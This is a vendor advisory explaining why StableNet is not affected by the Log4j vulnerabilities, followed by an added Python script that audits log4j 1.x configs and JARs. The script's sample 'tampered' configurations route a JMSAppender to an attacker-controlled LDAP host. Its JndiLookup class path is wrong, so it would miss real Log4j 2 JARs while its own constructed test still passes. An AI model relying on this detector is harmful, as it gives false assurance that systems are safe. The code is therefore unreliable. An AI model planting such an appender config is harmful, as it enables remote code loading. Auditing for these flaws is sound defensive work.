StableNet® is not affected by the known Log4j vulnerabilities
Würzburg, December 15th, 2021
WildFly from Red Hat is used as the application server for StableNet®. The WildFly version we use provides logging functions that are based on the log4j v1 API. However, according to an internal audit by Red Hat, the components used are not affected by the attack vectors described in CVE-2021-44228 ("Log4Shell"). That vulnerability lies in the JNDI message lookup feature of Log4j 2.x, which Log4j 1.x does not implement.
To confirm this independently, all StableNet®-related components were tested extensively by our development department. These tests confirmed the statement above for versions 9.x, 10.x and 11.x as well as for all business scripts. Versions older than 9.x were not checked.
The Log4j v1 issue related to the above is tracked as CVE-2021-4104. This flaw ONLY affects applications that are explicitly configured to use JMSAppender (which is not the default), or where an attacker already has write access to the Log4j configuration and can add a JMSAppender that points at a JMS broker under the attacker's control. Neither WildFly nor any StableNet® component configures a JMSAppender. Exploiting this flaw would therefore require direct write access to the Log4j configuration file, and an attacker with that level of access could simply run code of their choice directly, without needing the vulnerability at all.
Neither StableNet® nor WildFly uses any of the affected modules. StableNet® users are therefore also not affected by the known issues with Log4j v1.
For more information on WildFly and the vulnerabilities found, please see WildFly's news page.
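The two conditions described above can be checked mechanically on your own deployment. The following script is an added example and is not code from Infosim, Red Hat or the WildFly project. It assumes the standard log4j 1.2 configuration syntaxes (log4j.properties and log4j.xml), and all sample configurations, the hostname attacker.example, the JAR labels and the class-file stand-ins are constructed for the example. It flags any appender declared as org.apache.log4j.net.JMSAppender (the only code path behind CVE-2021-4104) and, as a separate classpath check, any JAR that carries Log4j 2's JndiLookup class, which Log4j 1.x does not ship.

```python
"""Audit a log4j 1.x deployment for the two conditions the advisory turns on.

Added example, not Infosim/Red Hat code. Checks (1) whether any appender in a
log4j.properties or log4j.xml is JMSAppender (CVE-2021-4104 is only reachable
through it) and (2) whether a JAR carries Log4j 2's JndiLookup class (the code
path behind CVE-2021-44228). All sample inputs below are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

JMS_APPENDER = "org.apache.log4j.net.JMSAppender"
LOG4J1_JMS_CLASS = "org/apache/log4j/net/JMSAppender.class"
LOG4J2_JNDI_CLASS = "org/apache/log4j/core/lookup/JndiLookup.class"

# Matches "log4j.appender.<NAME>=<class>" but not "log4j.appender.<NAME>.<param>=..."
_APPENDER_DEF = re.compile(r"^log4j\.appender\.([^.=\s]+)\s*=\s*(\S+)$")


def jms_appenders_in_properties(text):
    """Names of appenders declared as JMSAppender in a log4j.properties file."""
    found = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue  # java.util.Properties comment lines
        m = _APPENDER_DEF.match(line)
        if m and m.group(2) == JMS_APPENDER:
            found.append(m.group(1))
    return found


def jms_appenders_in_xml(text):
    """Names of <appender class="...JMSAppender"> elements in a log4j.xml file."""
    root = ET.fromstring(text)
    return [el.get("name", "?") for el in root.iter("appender")
            if el.get("class") == JMS_APPENDER]


def classify_jar(jar_bytes):
    """Report which Log4j classes a JAR (a zip) carries, from its entry list."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
    return {"log4j1_jmsappender": LOG4J1_JMS_CLASS in names,
            "log4j2_jndilookup": LOG4J2_JNDI_CLASS in names}


def audit_deployment(properties_text="", xml_text="", jars=()):
    """Combine config and classpath checks. jars: iterable of (label, bytes).

    A JAR with JndiLookup.class is a Log4j 2 candidate that still needs a
    version check (2.15.0 ships the class too), not a confirmed hit.
    """
    jms = []
    if properties_text:
        jms += jms_appenders_in_properties(properties_text)
    if xml_text:
        jms += jms_appenders_in_xml(xml_text)
    candidates = [label for label, data in jars
                  if classify_jar(data)["log4j2_jndilookup"]]
    return {"jms_appenders": jms,
            "cve_2021_4104_reachable": bool(jms),
            "cve_2021_44228_candidate_jars": candidates}


def make_jar(entry_names):
    """Build an in-memory JAR; entries hold only class-file magic (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in entry_names:
            zf.writestr(name, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


# --- constructed sample inputs ---------------------------------------------
SAFE_PROPERTIES = """\
# console only, no JMSAppender (the non-default case the advisory describes)
log4j.rootLogger=INFO, CONSOLE
log4j.appender.CONSOLE=org.apache.log4j.ConsoleAppender
log4j.appender.CONSOLE.layout=org.apache.log4j.PatternLayout
log4j.appender.CONSOLE.layout.ConversionPattern=%d %-5p [%c] %m%n
"""
# What someone with write access to the file could add: a JMSAppender whose JNDI
# provider is a host they control. attacker.example is a constructed name.
TAMPERED_PROPERTIES = """\
log4j.rootLogger=INFO, CONSOLE, JMS
log4j.appender.CONSOLE=org.apache.log4j.ConsoleAppender
log4j.appender.JMS=org.apache.log4j.net.JMSAppender
log4j.appender.JMS.InitialContextFactoryName=com.sun.jndi.ldap.LdapCtxFactory
log4j.appender.JMS.ProviderURL=ldap://attacker.example:1389/
log4j.appender.JMS.TopicBindingName=jms/topic
"""
TAMPERED_XML = """\
<log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/">
  <appender name="CONSOLE" class="org.apache.log4j.ConsoleAppender"/>
  <appender name="JMS" class="org.apache.log4j.net.JMSAppender">
    <param name="ProviderURL" value="ldap://attacker.example:1389/"/>
    <param name="TopicBindingName" value="jms/topic"/>
  </appender>
  <root><priority value="info"/><appender-ref ref="JMS"/></root>
</log4j:configuration>
"""
LOG4J1_JAR = make_jar(["org/apache/log4j/Logger.class", LOG4J1_JMS_CLASS])
LOG4J2_CORE_JAR = make_jar(["org/apache/logging/log4j/core/Logger.class", LOG4J2_JNDI_CLASS])

if __name__ == "__main__":
    print(audit_deployment(SAFE_PROPERTIES, jars=[("log4j-1.2.jar", LOG4J1_JAR)]))
    print(audit_deployment(TAMPERED_PROPERTIES, TAMPERED_XML,
                           jars=[("log4j-core.jar", LOG4J2_CORE_JAR)]))
```

Note that the presence of JMSAppender.class inside the log4j 1.x JAR is reported but not treated as a finding: the class is part of every log4j 1.2 distribution, and the advisory's point is that the flaw is reachable only when a configuration actually declares that appender.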